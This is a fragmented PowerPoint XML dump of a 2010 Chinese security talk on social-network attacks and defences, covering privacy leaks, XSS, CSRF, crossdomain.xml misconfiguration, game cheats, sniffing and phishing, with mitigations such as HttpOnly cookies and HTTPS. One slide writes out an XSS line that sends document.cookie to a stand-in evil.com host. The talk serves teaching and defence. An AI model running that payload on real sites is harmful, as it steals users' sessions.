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98" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="293" r:id="rId24"/>
    <p:sldId id="294" r:id="rId25"/>
    <p:sldId id="29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1" r:id="rId38"/>
    <p:sldId id="289" r:id="rId39"/>
    <p:sldId id="292" r:id="rId40"/>
    <p:sldId id="290" r:id="rId41"/>
    <p:sldId id="296" r:id="rId42"/>
    <p:sldId id="297" r:id="rId43"/>
    <p:sldId id="265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8A7B-5C34-4F43-AD83-33F968C0766A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C28D5-9D47-4624-8E31-71A542684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7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C28D5-9D47-4624-8E31-71A5426841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1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在前线，两军交战，天昏地暗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我军通过特定的飞鸽与后方司令部进行通信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>敌军想伪造这个通信，如何进行？中间人攻击？安插间谍？还可以这样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布置陷阱，当我军进入这个陷阱时，敌军偷偷将信息绑定在这只特定的飞鸽上，并放飞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>此时我军后方司令部收到了信息：撤兵一半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于是下令：撤兵一半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飞鸽：身份认证 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>– session/cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我军：被攻击者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>敌军：黑客</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>陷阱：恶意站点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黑客构造的网页</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>战场：浏览器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我军司令部：目标站点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>- web</a:t>
            </a:r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C28D5-9D47-4624-8E31-71A5426841E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crossdomain.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>足矣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C28D5-9D47-4624-8E31-71A5426841E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3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hackomega.com/steal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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.gif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gif"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.gif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gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.gif"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.gif"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.gif"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.gif"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45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邪恶的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击与防御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 Author: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>余弦</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t># Date: 2010/07/14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t># Email: evilcos@gmail.com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5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Incomplete Privacy Control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个人隐私页面的数据泄露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6543"/>
            <a:ext cx="6810375" cy="431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36130"/>
            <a:ext cx="681990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74751"/>
            <a:ext cx="6134100" cy="423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4905375" cy="519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58244"/>
            <a:ext cx="7343775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6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Incomplete Privacy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好友关系泄露</a:t>
            </a:r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58244"/>
            <a:ext cx="7343775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55018"/>
            <a:ext cx="88201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5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如果泄露个人基本信息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于黑客来说可以挖掘出更多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search engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>other databases!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果泄露了好友关系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对于黑客来说你已经没隐私了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黑了你好友的任意一位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>冒你的好友</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>里的社会工程学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1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业务与安全的矛盾</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为什</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>么隐私控制不能更严格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为什么要开放好友关系</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐私控制策略不应该偷偷进行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐私控制需要全面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>私控制也需要用户体验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0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Site Scripting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简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨站脚本攻击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客户端逻辑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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一旦出现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dirty="0" smtClean="0"/>
              <a:t>注入恶意的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到当前页面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等于完全控制了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客户端逻辑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等于任何隐私都不再是隐私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因为黑客可以轻易盗走它们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页面的隐私数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>户的身份认证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比如盗用户认证信息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>www.evil.com/steal.php?data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='+encodeURIComponent(document.cookie);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>还有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>更多的攻击手法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XSS Virus/Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS Phishing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zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>还</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>有更多更多的漏洞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9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16360"/>
            <a:ext cx="899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4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一切输入都不可信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>into database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>into module/class/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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>out encoding/escaping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whitelist or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>blacklist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7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 security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[path][Expires][Domain][Secure][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HttpOnly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 err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> cookie cannot be accessed through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>client side script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>仅仅保护身份认证不被盗用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2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Site Request Forgery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简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨站请求伪造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500188" y="4861893"/>
            <a:ext cx="3071812" cy="18573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/>
              <a:t>浏览器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214563" y="5576268"/>
            <a:ext cx="1714500" cy="714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/>
              <a:t>被攻击者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571625" y="2647330"/>
            <a:ext cx="3071813" cy="928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/>
              <a:t>目标站点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786438" y="5576268"/>
            <a:ext cx="1643062" cy="714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/>
              <a:t>恶意站点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1571625" y="4576143"/>
            <a:ext cx="200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1785938" y="4433268"/>
            <a:ext cx="2303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带上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>session/cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/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928688" y="384906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可信任的请求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943350" y="6174755"/>
            <a:ext cx="1857375" cy="158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4572000" y="5692155"/>
            <a:ext cx="12144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7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="3354388" y="4344368"/>
            <a:ext cx="1557337" cy="20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14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4214813" y="386176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可信任的请求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286500" y="2563193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7000875" y="2348880"/>
            <a:ext cx="1338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正常的请求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286500" y="299023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7000875" y="2848943"/>
            <a:ext cx="1338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伪造的请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29150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am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R&amp;D - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>知道创宇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knownsec.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>供更安全的互联网</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>founder of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xeyeteam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xeyeteam.appspot.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>hacking no area</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>长期致力于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安全研究与相关产品的研发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2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crossdomain.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的跨域通信配置文件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如果这样配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客构造恶意的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/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>户登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>qun.qq.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时，并浏览了这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>swf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swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以盗取用户页面的隐私数据了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72" y="2972544"/>
            <a:ext cx="5753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swf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> steal: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627362"/>
            <a:ext cx="8201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6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配置好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>crossdomain.xml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742653"/>
            <a:ext cx="851693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40904"/>
            <a:ext cx="7581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2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Game</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>外挂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Third-party Web Game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42381"/>
            <a:ext cx="6848475" cy="319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4" y="2892127"/>
            <a:ext cx="6819900" cy="370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0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数据包传输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 Game – AMF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DHTML Game – HTTP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 smtClean="0"/>
              <a:t>外挂基本原理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用户授权登录游戏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挂有后门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泄露账号信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>挂程序模拟发送数据包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>挂程序分析返回的数据包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Game</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自身防外挂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定几率的问题互动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答对了，认为不是外挂，且有奖励</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>答</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错多次，关黑屋</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>全局验证机制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输入正确，认为不是外挂，且有奖励</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概率与统计的运用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工参与审核</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>醒用户外挂风险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Lan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> sniffing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上明文传输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login data: username/password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r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面内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>wifi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无线热点很多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线可入侵：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEP, WPA,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线可钓鱼：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Phishing AP,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wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>lan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> sniffing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4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564904"/>
            <a:ext cx="92678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2961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4435"/>
            <a:ext cx="72961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1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全站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会牺牲性能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Gmail, Google Reader, QQ mail,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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>login on https!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password modify on https!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[path][Expires][Domain][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>][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HttpOnly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9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Phishing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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Phishing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个分工明确的地下产业链</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术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url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>似域名、相似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Advanced Phishing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DHTML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3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一、理解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二、攻防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、隐私泄露多种途径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SNS Virus/Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三、愈演愈烈的战争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原生态的攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>demo: steal password on hi.baidu.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://img.ddvip.com/2010_05_31/1275296005_ddvip_84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80" y="3068960"/>
            <a:ext cx="51435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防御将会很困难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上升到人与人的较量层面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
